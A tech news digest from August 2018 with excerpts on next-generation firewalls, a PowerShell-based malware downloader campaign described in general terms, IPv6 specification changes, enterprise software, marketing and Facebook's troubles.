Daily Tech Digest - August 27, 2018

What are next generation firewalls? How the cloud and complexity affect them

network security digital internet firewall binary code
So far, nextgen firewalls vendors haven't been able to fully translate their features to the needs of cloud environments, says NSS Labs' Spanbauer. "This is a significant engineering feat, and we're not quite there yet with a perfect replica, virtualized or physical." However, they are taking advantage of other capabilities that cloud offers, including the real-time sharing of threat intelligence data. "If you're patient zero, then that's an incredibly difficult scenario to block against," he says. "However, if you give it a minute or two minutes, then patient 10 or 15 to 20, with real-time updates, can be protected by virtue of the cloud abilities of the firewall." There's also the possibility of nextgen firewalls expanding into the endpoint security space. "If they merged, that would be a lot easier for enterprises to manage," says Spanbauer. "But that's not going to happen." Perimeter protection and endpoint protection will remain distinct for the foreseeable future, but the two sets of technologies could mutually benefit one another, he says.



Modular Downloaders Could Pose New Threat for Enterprises

The threat actor behind the campaign — an entity that Proofpoint identifies as TA555 — has been distributing AdvisorsBot via phishing emails containing a macro that initially executed a PowerShell command to download the malware. Since early August, the attacker has been using a macro to run a PowerShell command, which then downloads a PowerShell script capable of running AdvisorsBot without writing it to disk first, Proofpoint said. Interestingly, since first releasing the malware in May, its authors have completely rewritten it in PowerShell and .NET. Proofpoint has dubbed the new variant as PoshAdvisor and describes it as not identical to AdvisorsBot but containing many of the same functions, including the ability to download additional modules. ... It is certainly unusual for malware authors to do so and may be an attempt to further evade defenses. "For the enterprise, more variety in the threat landscape and newly coded malware increase complexity for defenders and should be driving investments in threat intelligence, robust layered defenses, and end user education," she says.


Machine learning turns unstructured secondary storage into globally accessible data

cloud data warehouse
It’s important to note, particularly for security-minded organizations, that Cohesity isn’t aggregating the data, just the object metadata, which then points to where the data is. Now storage administrators can globally roll out policies or make upgrades across the multi-node environment with a single click. ... One of the biggest and underappreciated benefits of SaaS is the ability to aggregate data across multiple customers and compare the data. In one’s consumer life, think of Amazon providing recommendations such as “Customers that bought X also bought Y.” Cohesity can compare data and understand its utilization or backup frequency or other data management capabilities against its peers and then make the appropriate changes. Digital CIOs need to shed conventional thinking around storage and think more about globally accessible and optimized data. This becomes particularly important in the ML era, when the quality of data can make the difference between being a market leader or a laggard. In particular, secondary storage may be the biggest, wasted resource that a company has, and being able to harness the knowledge and insights captured in it could help organizations accelerate their digital transformation efforts.


Why do enterprises take a long time to install vital security updates

The failure to rapidly deploy and install security updates is placing businesses at greater risk of a targeted cyberattack, as hackers look to exploit the vulnerabilities of outdated systems. Kollective’s report also found that 37% of IT managers list ‘a failure to install updates’ as the biggest security threat of 2018. This makes outdated software a bigger threat than password vulnerabilities (33%), BYOA / BYOD (22%) and unsecured USB sticks (9%). Even more startling, 13% of large businesses have given up on actively managing software distribution, and are, instead, passively asking employees to update their own systems. Kollective blames the failure to install updates on a combination of slow testing procedures and an inability to distribute updates automatically at scale. As Dan Vetras, CEO of Kollective explains: “Following numerous corporate cyberattacks over the last 12 months, today’s businesses are spending more than ever before on enhancing and improving their security systems. But, this investment is wasted if they aren’t keeping their systems up-to-date.


Here comes ‘antidisinformation as a service’

zuckerberg mark cutouts capitol
Most of the disinformation accounts deleted by Facebook, Twitter, Google and Microsoft were discovered not by those companies or the U.S. government, but by a company called FireEye. I told you in this space last year about disinformation as a service (DaaS). Most of the Russian disinformation campaigns are carried out by a private company called the Internet Research Agency. But now comes AaaS — antidisinformation as a service. That’s what FireEye provided this week to the Silicon Valley social networking companies. It considers itself a kind of NSA for hire — an intelligence organization, but for enterprises. How does it do it? FireEye’s methodology is multifaceted and a trade secret. But the company’s core competencies lie in discovering hidden malware and network hacks with the use of proprietary technology to detect behavioral anomalies — behavior by code and websites that isn’t normal. Once it finds the general nature of the weird behavior, it then does a lot of shoe-leather research.


What IPv6 features can be found in the latest specification?


The core IPv6 specification -- RFC 2460 -- has changed considerably since it was first released. The new IPv6 features are geared toward reliability, as well as operational and security considerations. To that end, the revised spec contains a security analysis of IPv6, with references to some of the work that's been carried out during the last few years, particularly in the area of IPv6 addressing. Other enhancements target IPv6 extension headers and fragmentation. For example, the original IPv6 specification allowed overlapping fragments -- that is, fragments that covered the same chunk of data from the original unfragmented datagram. The use of overlapping fragments to circumvent security controls was already very popular in the IPv4 world. However, even when there was no legitimate use for them in the IPv6 world, overlapping fragments were still considered valid. Such fragments were eventually declared illegal by RFC 5722, which published in 2009. Thus, the new specification incorporates that update, banning overlapping fragments.


Microsoft, Salesforce plan to open source major enterprise software products

open source keyboard
Microsoft ultimately decided that ONE is too important to keep to itself. “We have decided that this is such an important resource for everybody that just hoarding it ourselves is not the right thing to do,” Bahl said. “So, we are making it available to the entire community so that they can now — and it’s not just for production systems, but also for students that are now graduating.” The software will help large enterprises improve their network uptime by simulating changes to their network before rolling them out live. Microsoft hasn’t disclosed where it plans to release ONE, but GitHub — which Microsoft is in the process of acquiring — seems the logical choice. TransmogrifAI is an automated machine learning library for structured data, which makes sense coming from Salesforce, since its CRM products are built on the traditional row-and-column structure of a relational database. It’s written in Scala and built on top of Apache Spark, Apache’s in-memory analytics software.


Microsoft ups effort to drive Surface Go adoption

Microsoft Surface Go
One of the most fascinating things about executive leadership in most technology firms is that they generally don’t get marketing. It doesn’t seem to be taught in engineering schools and even those that get business degrees either opt to not take those classes or didn’t understand what they were taught. The result is that, in general, marketing is underfunded and staffed by people that don’t understand the critical parts of human nature that form the foundation of successful marketing campaigns.  Apple, during Steve Jobs tenure, was my best example of a firm that truly got the power of marketing and that company rose to be the most valuable (in terms of market cap) company in the segment. This was even though for much of the time they have been largely a one product company (iPod to iPhone). They outspent everyone they competed with occasional exception of Samsung who only occasionally outspent Apple with powerful competitive results (they are taking regular shots at Apple).


10 common pitfalls that threaten data quality strategies


“Implementing a data quality strategy is not as simple as installing a tool or a one-time fix,” explains Patty Haines, president and founder of Chimney Rock Information Solutions, Inc., a consultancy that aids organizations in building business intelligence and analytics environments by providing data warehouse and business intelligence services, solutions and mentoring. “Organizations across the enterprise need to work together to identify, assess, remediate, and monitor data with the goal of continual data improvements.” Haines offers her advice on 10 top challenges to a successful data quality strategy. ... “If differences in the definition and use of data continue, it can allow poor quality data to be entered, managed and reported,” Haines says. “The data quality strategy must include the business community, data governance, and subject matter experts working together to determine consistent and agreed-upon definitions to improve the quality of data.”


Why Facebook is powerless to stop its own descent

You could certainly argue that Facebook's problems aren't all of its own making. It's a tool that people use in whatever ways they decide. The fact that humanity has used the social network to power a renewal of tribalism, nationalism, and bigotry is hardly a phenomenon that Facebook or anyone else would have predicted. The problem for Facebook is that it took so long to respond--and it only truly did so after the issue became a PR nightmare. It had the opportunity to step up and figure out where the line was between healthy dialogue and hate speech, and it passed the buck. It prioritized user growth and activity over creating a healthy platform. A crisis doesn't build character, it reveals it--as the aphorism goes. Facebook has lost credibility. Few believe that it can be a leader in solving a problem that it helped create. As a result, the narrative around Facebook as a company and a platform is that it doesn't look out for its users' best interests. It doesn't put them first. And so more people are tuning out.



Quote for the day:


"Defeat is not the worst of failures. Not to have tried is the true failure." -- George Woodberry